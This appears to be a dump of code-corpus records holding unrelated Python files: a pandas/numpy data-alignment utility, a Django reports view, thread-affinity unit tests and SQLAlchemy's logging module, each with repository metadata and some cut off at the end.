__all__ = ['df_fillna', 'df_index', 'df_reindex', 'df_columns', 'presync', 'np_reindex', 'nona', 'df_slice', 'df_unslice', 'min_', 'max_', 'add_', 'mul_', 'sub_', 'div_', 'pow_']
def _list(values):
if isinstance(values, list):
return sum([_list(df) for df in values], [])
elif isinstance(values, dict):
return _list(list(values.values()))
else:
return [values]
@loop(list, tuple, dict)
def _index(ts):
if isinstance(ts, pd.Index):
return ts
elif is_pd(ts):
return ts.index
elif is_arr(ts):
return len(ts)
else:
raise ValueError('did not provide an index')
def _df_index(indexes, index):
if len(indexes) > 0:
if is_str(index):
if index[0].lower() == 'i':
return reducing('intersection')(indexes)
elif index[0].lower() == 'o':
return reducing('union')(indexes)
elif index[0].lower() == 'l':
return indexes[0]
elif index[0].lower() == 'r':
return indexes[-1]
else:
return _index(index)
else:
return None
def _np_index(indexes, index):
if len(indexes) > 0:
if index[0].lower() == 'i':
return min(indexes)
elif index[0].lower() == 'o':
return max(indexes)
elif index[0].lower() == 'l':
return indexes[0]
elif index[0].lower() == 'r':
return indexes[-1]
else:
return None
def df_index(seq, index = 'inner'):
listed = _list(seq)
indexes = [ts.index for ts in listed if is_pd(ts)]
if len(indexes):
return _df_index(indexes, index)
arrs = [len(ts) for ts in listed if is_arr(ts)]
if len(arrs):
return _np_index(arrs, index)
else:
return None
def df_columns(seq, index = 'inner'):
listed = _list(seq)
indexes= [ts.columns for ts in listed if is_df(ts) and ts.shape[1]>1 and len(set(ts.columns)) == ts.shape[1]]
if len(indexes):
return _df_index(indexes, index)
arrs = [ts.shape[1] for ts in listed if (is_arr(ts) or is_df(ts)) and len(ts.shape)>1 and ts.shape[1]>1]
if len(arrs):
return _np_index(arrs, index)
return None
@loop(list, tuple, dict)
def _df_fillna(df, method = None, axis = 0, limit = None):
methods = as_list(method)
if len(methods) == 0:
return df
if is_arr(df):
return df_fillna(pd.DataFrame(df) if len(df.shape)==2 else pd.Series(df), method, axis, limit).values
res = df
for m in methods:
if is_num(m):
res = res.fillna(value = m, axis = axis, limit = limit)
elif m in ['backfill', 'bfill', 'pad', 'ffill']:
res = res.fillna(method = m, axis = axis, limit = limit)
elif m in ('fnna', 'nona'):
nonan = ~np.isnan(res)
if len(res.shape)==2:
nonan = nonan.max(axis=1)
if m == 'fnna':
nonan = nonan[nonan.values]
if len(nonan):
res = res[nonan.index[0]:]
else:
res = res.iloc[:0]
elif m == 'nona':
res = res[nonan.values]
else:
if is_num(limit) and limit<0:
res = res.interpolate(method = m, axis = axis, limit = abs(limit),
limit_direction = 'backward')
else:
res = res.interpolate(method = m, axis = axis, limit = limit)
return res
def df_fillna(df, method = None, axis = 0, limit = None):
return _df_fillna(df, method = method, axis = axis, limit = limit)
@loop(dict, list, tuple)
def _nona(df, value = np.nan):
if np.isnan(value):
mask = np.isnan(df)
elif np.isinf(value):
mask = np.isinf(df)
else:
mask = df == value
if len(mask.shape) == 2:
mask = mask.min(axis=1) == 1
return df[~mask]
def nona(a, value = np.nan):
return _nona(a)
@loop(list, tuple, dict)
def _df_reindex(ts, index, method = None, limit = None):
methods = as_list(method)
if is_pd(ts):
if is_int(index):
raise ValueError('trying to reindex dataframe %s using numpy interval length %i'%(ts, index))
if len(methods) and methods[0] in ['backfill', 'bfill', 'pad', 'ffill']:
res = _nona(ts).reindex(index, method = methods[0], limit = limit)
res = _df_fillna(res, method = methods[1:], limit = limit)
else:
res = ts.reindex(index)
res = _df_fillna(res, method = method, limit = limit)
return res
elif is_arr(ts):
if isinstance(index, pd.Index):
if len(index) == len(ts):
return ts
else:
raise ValueError('trying to reindex numpy array %s using pandas index %s'%(ts, index))
elif is_int(index):
if index<len(ts):
res = ts[-index:]
elif index>len(ts):
shape = (index - len(ts),) + ts.shape[1:]
res = np.concatenate([np.full(shape, np.nan),ts])
else:
res = ts
return df_fillna(res, method = methods, limit = limit)
else:
return ts
else:
return ts
@loop(list, tuple, dict)
def _df_recolumn(ts, columns):
if columns is not None and is_df(ts) and ts.shape[1] > 1 and len(set(ts.columns)) == ts.shape[1]:
return pd.DataFrame({col: ts[col].values if col in ts.columns else np.nan for col in columns}, index = ts.index)
else:
return ts
def df_recolumn(ts, columns = None):
return _df_recolumn(ts, columns)
def np_reindex(ts, index, columns = None):
if is_pd(index):
index = index.index
if len(index)>len(ts):
index = index[-len(ts):]
elif len(index)<len(ts):
ts = ts[-len(index):]
res = pd.Series(ts, index) if len(ts.shape)<2 else pd.DataFrame(ts, index)
if columns is not None:
if is_df(columns):
columns = columns.columns
res.columns = columns
return res
def df_reindex(ts, index = None, method = None, limit = None):
if index is None:
return ts
elif is_str(index):
index = df_index(ts, index)
elif is_ts(index):
index = index.index
elif is_arr(index):
index = pd.Index(index)
return _df_reindex(ts, index = index, method = method, limit = limit)
def df_concat(objs, columns = None, axis=1, join = 'outer'):
if isinstance(objs, dict):
columns = list(objs.keys())
objs = list(objs.values())
if isinstance(objs, list):
df_objs = [o for o in objs if is_pd(o)]
res = pd.concat(df_objs, axis = axis, join = join)
if len(df_objs) < len(objs):
df_objs = [o if is_pd(o) else pd.Series(o, res.index) for o in objs]
res = pd.concat(df_objs, axis = axis, join = join)
elif isinstance(objs, pd.DataFrame):
res = objs.copy() if columns is not None else objs
if columns is not None:
if isinstance(columns, list):
res.columns = columns
else:
res = res.rename(columns = columns)
return res
@loop(list, dict, tuple)
def _df_column(ts, column, i = None, n = None):
if is_df(ts):
if ts.shape[1] == 1:
return ts[ts.columns[0]]
elif column in ts.columns:
return ts[column]
elif column is None and i is not None:
if len(set(ts.columns)) == ts.shape[1]:
raise ValueError('trying to grab %ith column from a dataframe with proper columns: %s'%(i, ts.columns))
elif n is not None and ts.shape[1]!=n:
raise ValueError('trying to grab %ith column and asserting must have %i columns but have %i'%(i, n, ts.shape[1]))
else:
if i<ts.shape[1]:
return ts.iloc[:,i]
else:
return np.nan
else:
return np.nan
elif is_arr(ts) and len(ts.shape) == 2:
if ts.shape[1] == 1:
return ts.T[0]
elif i is not None:
if n is not None and ts.shape[1]!=n:
raise ValueError('trying to grab %ith column and asserting must have %i columns but have %i'%(i, n, ts.shape[1]))
elif i<ts.shape[1]:
return ts.T[i]
else:
return np.nan
else:
return ts
else:
return ts
def df_column(ts, column, i = None, n = None):
return _df_column(ts = ts, column = column, i = i, n = n)
def _convert(res, columns):
values = list(res.values())
if is_tss(values):
return pd.DataFrame(res)
elif is_arrs(values) and is_int(columns):
return np.array(values).T
elif is_tuples(values):
return tuple([_convert(dict(zip(res.keys(), row)), columns) for row in zipper(*values)])
else:
return np.array(values) if is_int(columns) else pd.Series(res)
def df_sync(dfs, join = 'ij', method = None, columns = 'ij'):
if isinstance(dfs, dict):
values = list(dfs.values())
elif isinstance(dfs, (list, tuple)):
values = list(dfs)
else:
return dfs
listed = _list(values)
tss = [ts for ts in listed if is_ts(ts)]
index = df_index(listed, join)
dfs = df_reindex(dfs, index, method = method)
### now we do the columns
if columns is False or columns is None:
return dfs
else:
cols = df_columns(tss, columns)
dfs = df_recolumn(dfs, cols)
return dfs
class presync(wrapper):
def __init__(self, function = None, index = 'inner', method = None, columns = 'inner', default = np.nan):
super(presync, self).__init__(function = function, index = index, method = method, columns = columns , default = default)
@property
def ij(self):
return copy(self) + dict(index = 'inner')
@property
def oj(self):
return self + dict(index = 'outer')
@property
def lj(self):
return self + dict(index = 'left')
@property
def rj(self):
return self + dict(index = 'right')
@property
def ffill(self):
return copy(self) + dict(method = 'ffill')
@property
def bfill(self):
return self + dict(method = 'bfill')
def wrapped(self, *args, **kwargs):
_idx = kwargs.pop('join', self.index)
_method = kwargs.pop('method', self.method)
_columns = kwargs.pop('columns', self.columns)
values = list(args) + list(kwargs.values())
listed = _list(values)
tss = [ts for ts in listed if is_ts(ts)]
callargs = inspect.getcallargs(self.function, *args, **kwargs)
if is_str(_idx) and _idx in callargs:
index = _index(callargs[_idx])
else:
index = df_index(listed, _idx)
args_= df_reindex(args, index, method = _method)
kwargs_= df_reindex(kwargs, index, method = _method)
### now we do the columns
if _columns is False:
return self.function(*args_, **kwargs_)
else:
cols = [tuple(ts.columns) for ts in tss if is_df(ts) and ts.shape[1]>1]
if len(set(cols))==1: # special case where all 2-d dataframes have same column headers
columns = cols[0]
n = len(columns)
res = {column: self.function(*df_column(args_,column = column, i = i, n = n), **df_column(kwargs_, column=column, i = i, n = n)) for i, column in enumerate(columns)}
else:
columns = df_columns(listed, _columns)
if is_int(columns):
res = {i: self.function(*df_column(args_, column = None, i = i), **df_column(kwargs_, column=None, i = i)) for i in range(columns)}
elif columns is None:
return self.function(*df_column(args_, column = None), **df_column(kwargs_, column = None))
else:
columns = list(columns) if isinstance(columns, pd.Index) else as_list(columns)
columns = sorted(columns)
res = {column: self.function(*df_column(args_,column = column), **df_column(kwargs_, column=column)) for column in columns}
converted = _convert(res, columns)
return converted
@presync
def _div_(a, b):
return a/b
@presync
def _sub_(a, b):
return a-b
@presync
def _add_(a, b):
return a + b
@presync
def _mul_(a, b):
return a * b
@presync
def _pow_(a, b):
return a**b
def add_(a, b = None, join = 'ij', method = None, columns = 'ij'):
dfs = as_list(a) + as_list(b)
f = lambda a, b: _add_(a, b, join = join, method = method, columns = columns)
return reducer(f, dfs)
def mul_(a, b = None, join = 'ij', method = None, columns = 'ij'):
dfs = as_list(a) + as_list(b)
f = lambda a, b: _mul_(a, b, join = join, method = method, columns = columns)
return reducer(f, dfs)
def div_(a, b, join = 'ij', method = None, columns = 'ij'):
if isinstance(a, list):
a = mul_(a, join = join, method = method, columns = columns)
if isinstance(b, list):
b = mul_(b, join = join, method = method, columns = columns)
return _div_(a, b, join = join, method = method, columns = columns)
def sub_(a, b, join = 'ij', method = None, columns = 'ij'):
if isinstance(a, list):
a = add_(a, join = join, method = method, columns = columns)
if isinstance(b, list):
b = add_(b, join = join, method = method, columns = columns)
return _sub_(a, b, join = join, method = method, columns = columns)
def pow_(a, b, join = 'ij', method = None, columns = 'ij'):
return _pow_(a,b, join = join, method = method, columns = columns)
def min_(a, b = None, join = 'ij', method = None, columns = 'ij'):
dfs = as_list(a) + as_list(b)
dfs = df_sync(dfs, join = join, method = method, columns = columns)
return reducer(np.minimum, dfs)
def max_(a, b = None, join = 'ij', method = None, columns = 'ij'):
dfs = as_list(a) + as_list(b)
dfs = df_sync(dfs, join = join, method = method, columns = columns)
return reducer(np.maximum, dfs)
def _closed(oc):
if oc in '()oO':
return False
elif oc in '[]cC':
return True
else:
raise ValueError('not sure how to parse boundary %s'%oc)
def _df_slice(df, lb = None, ub = None, openclose = '[)'):
if isinstance(df, (pd.Index, pd.Series, pd.DataFrame)) and len(df)>0 and (ub is not None or lb is not None):
l,u = openclose if openclose else '[)'
l = _closed(l); u = _closed(u)
if is_ts(df):
lb = lb if lb is None or isinstance(lb, datetime.time) else dt(lb)
ub = ub if ub is None or isinstance(ub, datetime.time) else dt(ub)
if (l or lb is None) and (u or ub is None):
try:
return df[lb:ub]
except Exception:
pass
elif (l or lb is None) and (ub is None or not u):
try:
return df[lb:ub]
except Exception:
pass
if lb is not None:
index = df if isinstance(df, pd.Index) else df.index
if isinstance(lb, datetime.time):
index = index.time
df = df[index>=lb] if l else df[index>lb]
if ub is not None:
index = df if isinstance(df, pd.Index) else df.index
if isinstance(ub, datetime.time):
index = index.time
df = df[index<=ub] if u else df[index<ub]
return df
def df_slice(df, lb = None, ub = None, openclose = '(]', n = 1):
if isinstance(lb, tuple) and len(lb) == 2 and ub is None:
lb, ub = lb
if isinstance(ub, datetime.time) and isinstance(lb, datetime.time) and lb>ub:
pre = df_slice(df, None, ub)
post = df_slice(df, lb, None)
return pd.concat([pre, post]).sort_index()
if isinstance(df, list):
if isinstance(lb, list) and ub is None:
ub = lb[1:] + [None]
elif isinstance(ub, list) and lb is None:
lb = [None] + ub[:-1]
boundaries = sorted(set([date for date in lb + ub if date is not None]))
df = [d if is_pd(d) else pd.Series(d, boundaries) for d in df]
if n > 1:
df = [pd.concat(df[i: i+n], axis = 1) for i in range(len(df))]
for d in df:
d.columns = range(d.shape[1])
dfs = as_list(df)
dlu = zipper(dfs, lb, ub)
res = [_df_slice(d, lb = l, ub = u, openclose = openclose) for d, l, u in dlu]
if len(res) == 0:
return None
elif len(res) == 1:
return res[0]
elif isinstance(lb, list) and isinstance(ub, list):
res = pd.concat(res)
return res
def df_unslice(df, ub):
n = df.shape[1] if is_df(df) else 1
res = dictable(ub = ub, lb = [None] + ub[:-1], i = range(len(ub)))
res = res(ts = lambda lb, ub: df_slice(df, lb, ub, '(]'))
res = res(rs = lambda i, ts: dictable(u = ub[i: i+n], j = range(len(ub[i: i+n])))(ts = lambda j: ts[j]))
rs = dictable.concat(res.rs).listby('u').do([pd.concat, nona], 'ts')
return dict(rs['u', 'ts'])
| true
| true
|
f70509cbebb9afd7e84c6f7a0db27094fc3c5d62
| 1,155
|
py
|
Python
|
bis/apps/gepiandashboard/views/reports.py
|
AgustinMachiavello/business-incubation-system
|
983e1308697771570891568f99d1b8ba74441d32
|
[
"MIT"
] | 2
|
2021-03-03T16:16:42.000Z
|
2021-03-08T22:43:10.000Z
|
bis/apps/gepiandashboard/views/reports.py
|
AgustinMachiavello/business-incubation-system
|
983e1308697771570891568f99d1b8ba74441d32
|
[
"MIT"
] | null | null | null |
bis/apps/gepiandashboard/views/reports.py
|
AgustinMachiavello/business-incubation-system
|
983e1308697771570891568f99d1b8ba74441d32
|
[
"MIT"
] | null | null | null |
"""Reports views"""
# Django
from django.views.generic import TemplateView
# Shortcuts
from django.shortcuts import render
from django.shortcuts import redirect, reverse, get_object_or_404
from django.contrib.auth import authenticate
from django.http import (
HttpResponse,
HttpResponseNotFound,
HttpResponseServerError,
HttpResponseRedirect,
)
# Rest framework
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.permissions import (
IsAuthenticated,
IsAdminUser,
)
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
# Menus
from ...incubator.helpers.helperDictionaries import getReportsIndexMenus, getReportIndexAnalytics
class ReportsIndex(TemplateView):
template_name = 'gepiandashboard/pages/reports_index.html'
context = {}
def get(self, request):
if not request.user.is_authenticated:
return render(request, 'errors/401.html')
self.context['menus'] = getReportsIndexMenus()
self.context['analytics'] = getReportIndexAnalytics()
return render(request, self.template_name, self.context)
| 29.615385
| 97
| 0.772294
|
from django.views.generic import TemplateView
from django.shortcuts import render
from django.shortcuts import redirect, reverse, get_object_or_404
from django.contrib.auth import authenticate
from django.http import (
HttpResponse,
HttpResponseNotFound,
HttpResponseServerError,
HttpResponseRedirect,
)
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.permissions import (
IsAuthenticated,
IsAdminUser,
)
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from ...incubator.helpers.helperDictionaries import getReportsIndexMenus, getReportIndexAnalytics
class ReportsIndex(TemplateView):
template_name = 'gepiandashboard/pages/reports_index.html'
context = {}
def get(self, request):
if not request.user.is_authenticated:
return render(request, 'errors/401.html')
self.context['menus'] = getReportsIndexMenus()
self.context['analytics'] = getReportIndexAnalytics()
return render(request, self.template_name, self.context)
| true
| true
|
f7050b4939e82b1488b36ea71d1c8a68281e80ae
| 1,683
|
py
|
Python
|
test/TestThreadAffinityLibrary.py
|
srgrr/thread_affinity
|
56c8a50ea3fed276143a3794b8698d25816ca4a9
|
[
"Apache-2.0"
] | 3
|
2018-11-30T11:11:34.000Z
|
2020-08-12T16:48:36.000Z
|
test/TestThreadAffinityLibrary.py
|
srgrr/thread_affinity
|
56c8a50ea3fed276143a3794b8698d25816ca4a9
|
[
"Apache-2.0"
] | 1
|
2019-09-28T23:08:21.000Z
|
2019-09-28T23:08:21.000Z
|
test/TestThreadAffinityLibrary.py
|
bsc-wdc/thread_affinity
|
56c8a50ea3fed276143a3794b8698d25816ca4a9
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import random
import subprocess
import signal
import sys
import os
import thread_affinity
# Test results may vary if executed in different systems
# with different amount of CPUUs
def get_random_mask():
"""Return a random, valid affinity mask
Which is a subset of {0, 1, ..., 2 ** num_procs - 1}
"""
num_procs = thread_affinity.get_nprocs()
r = random.randint(1, 2 ** num_procs)
return [i for i in range(num_procs) if (r & (1 << i))]
class TestThreadAffinityLibrary(unittest.TestCase):
"""Test basic Thread Affinity features.
"""
def test_set_get_affinity(self):
"""Test if a simple set & get works
"""
random.seed(1)
proc_list = get_random_mask()
thread_affinity.setaffinity(proc_list)
self.assertEqual(proc_list, thread_affinity.get_affinity())
def test_set_get_incorrect_affinity(self):
"""Test if the program sets the default affinity in case of illegal masks
"""
illegal_mask = [-1]
default_affinity = thread_affinity.get_default_affinity()
thread_affinity.setaffinity(illegal_mask)
self.assertEqual(default_affinity, thread_affinity.get_affinity())
def test_set_get_affinity_subprocess(self):
"""Test if the affinity of a subprocess can be controlled from above
"""
random.seed(3)
proc_list = get_random_mask()
import subprocess
proc = subprocess.Popen(["python", "-c", "while True: pass"])
thread_affinity.set_affinity(proc_list, proc.pid)
self.assertEqual(proc_list, thread_affinity.get_affinity(proc.pid))
proc.send_signal(signal.SIGKILL)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestThreadAffinityLibrary)
unittest.TextTestRunner(verbosity = 2).run(suite)
| 30.6
| 79
| 0.758764
|
import unittest
import random
import subprocess
import signal
import sys
import os
import thread_affinity
def get_random_mask():
num_procs = thread_affinity.get_nprocs()
r = random.randint(1, 2 ** num_procs)
return [i for i in range(num_procs) if (r & (1 << i))]
class TestThreadAffinityLibrary(unittest.TestCase):
def test_set_get_affinity(self):
random.seed(1)
proc_list = get_random_mask()
thread_affinity.setaffinity(proc_list)
self.assertEqual(proc_list, thread_affinity.get_affinity())
def test_set_get_incorrect_affinity(self):
illegal_mask = [-1]
default_affinity = thread_affinity.get_default_affinity()
thread_affinity.setaffinity(illegal_mask)
self.assertEqual(default_affinity, thread_affinity.get_affinity())
def test_set_get_affinity_subprocess(self):
random.seed(3)
proc_list = get_random_mask()
import subprocess
proc = subprocess.Popen(["python", "-c", "while True: pass"])
thread_affinity.set_affinity(proc_list, proc.pid)
self.assertEqual(proc_list, thread_affinity.get_affinity(proc.pid))
proc.send_signal(signal.SIGKILL)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestThreadAffinityLibrary)
unittest.TextTestRunner(verbosity = 2).run(suite)
| true
| true
|
f7050b93fb88c44b9196e0bbbdaf73e49e3cfa6c
| 8,633
|
py
|
Python
|
lib/sqlalchemy/log.py
|
sqlalchemy-bot/sqlalchemy
|
c0736e0b2a3bf8c0952db84f5b9943df9ebf18f7
|
[
"MIT"
] | null | null | null |
lib/sqlalchemy/log.py
|
sqlalchemy-bot/sqlalchemy
|
c0736e0b2a3bf8c0952db84f5b9943df9ebf18f7
|
[
"MIT"
] | null | null | null |
lib/sqlalchemy/log.py
|
sqlalchemy-bot/sqlalchemy
|
c0736e0b2a3bf8c0952db84f5b9943df9ebf18f7
|
[
"MIT"
] | null | null | null |
# sqlalchemy/log.py
# Copyright (C) 2006-2022 the SQLAlchemy authors and contributors
# <see AUTHORS file>
# Includes alterations by Vinay Sajip vinay_sajip@yahoo.co.uk
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""Logging control and utilities.
Control of logging for SA can be performed from the regular python logging
module. The regular dotted module namespace is used, starting at
'sqlalchemy'. For class-level logging, the class name is appended.
The "echo" keyword parameter, available on SQLA :class:`_engine.Engine`
and :class:`_pool.Pool` objects, corresponds to a logger specific to that
instance only.
"""
from __future__ import annotations
import logging
import sys
from typing import Any
from typing import Optional
from typing import overload
from typing import Set
from typing import Type
from typing import TypeVar
from typing import Union
from .util import py311
from .util import py38
from .util.typing import Literal
if py38:
STACKLEVEL = True
# needed as of py3.11.0b1
# #8019
STACKLEVEL_OFFSET = 2 if py311 else 1
else:
STACKLEVEL = False
STACKLEVEL_OFFSET = 0
_IT = TypeVar("_IT", bound="Identified")
_EchoFlagType = Union[None, bool, Literal["debug"]]
# set initial level to WARN. This so that
# log statements don't occur in the absence of explicit
# logging being enabled for 'sqlalchemy'.
rootlogger = logging.getLogger("sqlalchemy")
if rootlogger.level == logging.NOTSET:
rootlogger.setLevel(logging.WARN)
def _add_default_handler(logger: logging.Logger) -> None:
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter("%(asctime)s %(levelname)s %(name)s %(message)s")
)
logger.addHandler(handler)
_logged_classes: Set[Type["Identified"]] = set()
def _qual_logger_name_for_cls(cls: Type["Identified"]) -> str:
return (
getattr(cls, "_sqla_logger_namespace", None)
or cls.__module__ + "." + cls.__name__
)
def class_logger(cls: Type[_IT]) -> Type[_IT]:
logger = logging.getLogger(_qual_logger_name_for_cls(cls))
cls._should_log_debug = lambda self: logger.isEnabledFor( # type: ignore[assignment] # noqa: E501
logging.DEBUG
)
cls._should_log_info = lambda self: logger.isEnabledFor( # type: ignore[assignment] # noqa: E501
logging.INFO
)
cls.logger = logger
_logged_classes.add(cls)
return cls
_IdentifiedLoggerType = Union[logging.Logger, "InstanceLogger"]
class Identified:
__slots__ = ()
logging_name: Optional[str] = None
logger: _IdentifiedLoggerType
_echo: _EchoFlagType
def _should_log_debug(self) -> bool:
return self.logger.isEnabledFor(logging.DEBUG)
def _should_log_info(self) -> bool:
return self.logger.isEnabledFor(logging.INFO)
class InstanceLogger:
"""A logger adapter (wrapper) for :class:`.Identified` subclasses.
This allows multiple instances (e.g. Engine or Pool instances)
to share a logger, but have its verbosity controlled on a
per-instance basis.
The basic functionality is to return a logging level
which is based on an instance's echo setting.
Default implementation is:
'debug' -> logging.DEBUG
True -> logging.INFO
False -> Effective level of underlying logger (
logging.WARNING by default)
None -> same as False
"""
# Map echo settings to logger levels
_echo_map = {
None: logging.NOTSET,
False: logging.NOTSET,
True: logging.INFO,
"debug": logging.DEBUG,
}
_echo: _EchoFlagType
__slots__ = ("echo", "logger")
def __init__(self, echo: _EchoFlagType, name: str):
self.echo = echo
self.logger = logging.getLogger(name)
# if echo flag is enabled and no handlers,
# add a handler to the list
if self._echo_map[echo] <= logging.INFO and not self.logger.handlers:
_add_default_handler(self.logger)
#
# Boilerplate convenience methods
#
def debug(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a debug call to the underlying logger."""
self.log(logging.DEBUG, msg, *args, **kwargs)
def info(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate an info call to the underlying logger."""
self.log(logging.INFO, msg, *args, **kwargs)
def warning(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a warning call to the underlying logger."""
self.log(logging.WARNING, msg, *args, **kwargs)
warn = warning
def error(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""
Delegate an error call to the underlying logger.
"""
self.log(logging.ERROR, msg, *args, **kwargs)
def exception(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate an exception call to the underlying logger."""
kwargs["exc_info"] = 1
self.log(logging.ERROR, msg, *args, **kwargs)
def critical(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a critical call to the underlying logger."""
self.log(logging.CRITICAL, msg, *args, **kwargs)
def log(self, level: int, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a log call to the underlying logger.
The level here is determined by the echo
flag as well as that of the underlying logger, and
logger._log() is called directly.
"""
# inline the logic from isEnabledFor(),
# getEffectiveLevel(), to avoid overhead.
if self.logger.manager.disable >= level:
return
selected_level = self._echo_map[self.echo]
if selected_level == logging.NOTSET:
selected_level = self.logger.getEffectiveLevel()
if level >= selected_level:
if STACKLEVEL:
kwargs["stacklevel"] = (
kwargs.get("stacklevel", 1) + STACKLEVEL_OFFSET
)
self.logger._log(level, msg, args, **kwargs)
def isEnabledFor(self, level: int) -> bool:
"""Is this logger enabled for level 'level'?"""
if self.logger.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def getEffectiveLevel(self) -> int:
"""What's the effective level for this logger?"""
level = self._echo_map[self.echo]
if level == logging.NOTSET:
level = self.logger.getEffectiveLevel()
return level
def instance_logger(
instance: Identified, echoflag: _EchoFlagType = None
) -> None:
"""create a logger for an instance that implements :class:`.Identified`."""
if instance.logging_name:
name = "%s.%s" % (
_qual_logger_name_for_cls(instance.__class__),
instance.logging_name,
)
else:
name = _qual_logger_name_for_cls(instance.__class__)
instance._echo = echoflag # type: ignore
logger: Union[logging.Logger, InstanceLogger]
if echoflag in (False, None):
# if no echo setting or False, return a Logger directly,
# avoiding overhead of filtering
logger = logging.getLogger(name)
else:
# if a specified echo flag, return an EchoLogger,
# which checks the flag, overrides normal log
# levels by calling logger._log()
logger = InstanceLogger(echoflag, name)
instance.logger = logger # type: ignore
class echo_property:
__doc__ = """\
When ``True``, enable log output for this element.
This has the effect of setting the Python logging level for the namespace
of this element's class and object reference. A value of boolean ``True``
indicates that the loglevel ``logging.INFO`` will be set for the logger,
whereas the string value ``debug`` will set the loglevel to
``logging.DEBUG``.
"""
@overload
def __get__(
self, instance: Literal[None], owner: Type[Identified]
) -> echo_property:
...
@overload
def __get__(
self, instance: Identified, owner: Type[Identified]
) -> _EchoFlagType:
...
def __get__(
self, instance: Optional[Identified], owner: Type[Identified]
) -> Union[echo_property, _EchoFlagType]:
if instance is None:
return self
else:
return instance._echo
def __set__(self, instance: Identified, value: _EchoFlagType) -> None:
instance_logger(instance, echoflag=value)
| 29.565068
| 103
| 0.654697
|
from __future__ import annotations
import logging
import sys
from typing import Any
from typing import Optional
from typing import overload
from typing import Set
from typing import Type
from typing import TypeVar
from typing import Union
from .util import py311
from .util import py38
from .util.typing import Literal
if py38:
STACKLEVEL = True
STACKLEVEL_OFFSET = 2 if py311 else 1
else:
STACKLEVEL = False
STACKLEVEL_OFFSET = 0
_IT = TypeVar("_IT", bound="Identified")
_EchoFlagType = Union[None, bool, Literal["debug"]]
# logging being enabled for 'sqlalchemy'.
rootlogger = logging.getLogger("sqlalchemy")
if rootlogger.level == logging.NOTSET:
rootlogger.setLevel(logging.WARN)
def _add_default_handler(logger: logging.Logger) -> None:
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter("%(asctime)s %(levelname)s %(name)s %(message)s")
)
logger.addHandler(handler)
_logged_classes: Set[Type["Identified"]] = set()
def _qual_logger_name_for_cls(cls: Type["Identified"]) -> str:
return (
getattr(cls, "_sqla_logger_namespace", None)
or cls.__module__ + "." + cls.__name__
)
def class_logger(cls: Type[_IT]) -> Type[_IT]:
logger = logging.getLogger(_qual_logger_name_for_cls(cls))
cls._should_log_debug = lambda self: logger.isEnabledFor( # type: ignore[assignment] # noqa: E501
logging.DEBUG
)
cls._should_log_info = lambda self: logger.isEnabledFor( # type: ignore[assignment] # noqa: E501
logging.INFO
)
cls.logger = logger
_logged_classes.add(cls)
return cls
_IdentifiedLoggerType = Union[logging.Logger, "InstanceLogger"]
class Identified:
__slots__ = ()
logging_name: Optional[str] = None
logger: _IdentifiedLoggerType
_echo: _EchoFlagType
def _should_log_debug(self) -> bool:
return self.logger.isEnabledFor(logging.DEBUG)
def _should_log_info(self) -> bool:
return self.logger.isEnabledFor(logging.INFO)
class InstanceLogger:
# Map echo settings to logger levels
_echo_map = {
None: logging.NOTSET,
False: logging.NOTSET,
True: logging.INFO,
"debug": logging.DEBUG,
}
_echo: _EchoFlagType
__slots__ = ("echo", "logger")
def __init__(self, echo: _EchoFlagType, name: str):
self.echo = echo
self.logger = logging.getLogger(name)
# if echo flag is enabled and no handlers,
# add a handler to the list
if self._echo_map[echo] <= logging.INFO and not self.logger.handlers:
_add_default_handler(self.logger)
#
# Boilerplate convenience methods
#
def debug(self, msg: str, *args: Any, **kwargs: Any) -> None:
self.log(logging.DEBUG, msg, *args, **kwargs)
def info(self, msg: str, *args: Any, **kwargs: Any) -> None:
self.log(logging.INFO, msg, *args, **kwargs)
def warning(self, msg: str, *args: Any, **kwargs: Any) -> None:
self.log(logging.WARNING, msg, *args, **kwargs)
warn = warning
def error(self, msg: str, *args: Any, **kwargs: Any) -> None:
self.log(logging.ERROR, msg, *args, **kwargs)
def exception(self, msg: str, *args: Any, **kwargs: Any) -> None:
kwargs["exc_info"] = 1
self.log(logging.ERROR, msg, *args, **kwargs)
def critical(self, msg: str, *args: Any, **kwargs: Any) -> None:
self.log(logging.CRITICAL, msg, *args, **kwargs)
def log(self, level: int, msg: str, *args: Any, **kwargs: Any) -> None:
# inline the logic from isEnabledFor(),
# getEffectiveLevel(), to avoid overhead.
if self.logger.manager.disable >= level:
return
selected_level = self._echo_map[self.echo]
if selected_level == logging.NOTSET:
selected_level = self.logger.getEffectiveLevel()
if level >= selected_level:
if STACKLEVEL:
kwargs["stacklevel"] = (
kwargs.get("stacklevel", 1) + STACKLEVEL_OFFSET
)
self.logger._log(level, msg, args, **kwargs)
def isEnabledFor(self, level: int) -> bool:
if self.logger.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def getEffectiveLevel(self) -> int:
level = self._echo_map[self.echo]
if level == logging.NOTSET:
level = self.logger.getEffectiveLevel()
return level
def instance_logger(
instance: Identified, echoflag: _EchoFlagType = None
) -> None:
if instance.logging_name:
name = "%s.%s" % (
_qual_logger_name_for_cls(instance.__class__),
instance.logging_name,
)
else:
name = _qual_logger_name_for_cls(instance.__class__)
instance._echo = echoflag # type: ignore
logger: Union[logging.Logger, InstanceLogger]
if echoflag in (False, None):
# if no echo setting or False, return a Logger directly,
# avoiding overhead of filtering
logger = logging.getLogger(name)
else:
# if a specified echo flag, return an EchoLogger,
# which checks the flag, overrides normal log
# levels by calling logger._log()
logger = InstanceLogger(echoflag, name)
instance.logger = logger # type: ignore
class echo_property:
__doc__ = """\
When ``True``, enable log output for this element.
